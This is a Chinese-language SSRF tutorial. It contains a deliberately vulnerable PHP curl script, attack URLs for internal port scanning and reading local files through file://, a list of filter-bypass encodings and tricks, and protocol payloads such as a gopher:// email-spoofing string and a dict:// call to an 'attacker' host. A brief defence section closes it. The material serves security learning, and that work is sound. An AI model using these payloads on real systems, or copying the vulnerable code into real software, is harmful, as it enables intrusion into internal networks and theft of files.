渗透之路基础 -- 服务端请求伪造SSRF

简介：SSRF 服务器端请求伪造，有的大型网站在web应用上提供了从其他服务器获取数据的功能。使用户指定的URL web应用获取图片，下载文件，读取文件内容。通常用于控制web进而探测内网服务以及攻击内网脆弱应用

即当作跳板机，可作为ssrfsocks代理

漏洞危害

1. 内外网的端口和服务扫描

2. 主机本地敏感数据的读取

3. 内外网主机应用程序漏洞的利用

4. 内外网Web站点漏洞的利用

漏洞产生

由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制。

本地测试

假设服务器Web应用存在SSRF

<?php
if(isset($_GET['url']))
{
    $link=$_GET['url'];
    //$filename='./'.rand().'.txt';
    $curlobj=curl_init($link);
    curl_setopt($curlobj,CURLOPT_FILE,$link);
    curl_setopt($curlobj,CURLOPT_HEADER,0);
    $result=curl_exec($curlobj);
    curl_exec($curlobj);
    curl_close($curlobj);
    //fclose($link);
    //file_put_contents($filename, $result);
    echo $result;
}
?>

攻击利用

1. 可以对外网，服务器所在内网，本地进行端口扫描，获取一些服务的banner 信息

通过访问修改参数后的 192.168.203.128/test/ssrf.php?url=127.0.0.1:3306

会获取到服务器的信息

1. 攻击运行在内网或本地的应用程序 （溢出）

2. 对内网web应用进行指纹识别，通过访问默认文件实现

3. 攻击内外网的web应用，主要是使用 get 参数就可以实现的攻击

4. 利用 file 协议读取本地文件等

访问 192.168.203.128/test/ssrf.php?url=file:///c:/config.ini

可以直接读取文件

漏洞发现及挖掘

1. 通过 URL 地址分享网页内容

2. 转码服务

3. 在线翻译

4. 图片加载与下载；通过 URL 下载或加载图片

5. 图片文章收藏功能

6. 未公开的api实现以及其它调用 URL 的功能

7. 从 URL 关键字中寻找

   share
   wap
   url
   link
   src
   source
   target
   u
   3g
   display
   sourceURl
   imageURL
   domain
   ...
   

绕过思路

1、攻击本地

http://127.0.0.1:80
http://localhost:22

2、利用[::]

利用[::]绕过localhost
http://[::]:80/  >>>  http://127.0.0.1

也有看到利用http://0000::1:80/的，但是我测试未成功

3、利用@

http://example.com@127.0.0.1

4、利用短地址

http://dwz.cn/11SMa  >>>  http://127.0.0.1

5、利用特殊域名

利用的原理是DNS解析

http://127.0.0.1.xip.io/
http://www.owasp.org.127.0.0.1.xip.io/

6、利用DNS解析

在域名上设置A记录，指向127.0.0.1

7、利用参数类型

也不一定是上传，我也说不清，自己体会 -.-
修改"type=file"为"type=url"
比如：
上传图片处修改上传，将图片文件修改为URL，即可能触发SSRF

8、利用Enclosed alphanumerics

利用Enclosed alphanumerics
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

9、利用句号

127。0。0。1  >>>  127.0.0.1

10、利用进制转换

可以是十六进制，八进制等。
115.239.210.26  >>>  16373751032
首先把这四段数字给分别转成16进制，结果：73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样)，十六进制加0x

http://127.0.0.1  >>>  http://0177.0.0.1/

http://127.0.0.1  >>>  http://2130706433/

http://192.168.0.1  >>>  http://3232235521/
http://192.168.1.1  >>>  http://3232235777/

11、利用特殊地址

http://0/

12、利用协议

Dict://
dict://<user-auth>@<host>:<port>/d:<word>
ssrf.php?url=dict://attacker:11111/
SFTP://
ssrf.php?url=sftp://example.com:11111/
TFTP://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

13、使用组合

各种绕过进行自由组合即可

漏洞防护

1. 服务端开启OpenSSL无法交互利用
2. 服务端需要认证交互
3. 限制协议为HTTP、HTTPS
4. 禁止30x跳转次数
5. 设置URL白名单或限制内网IP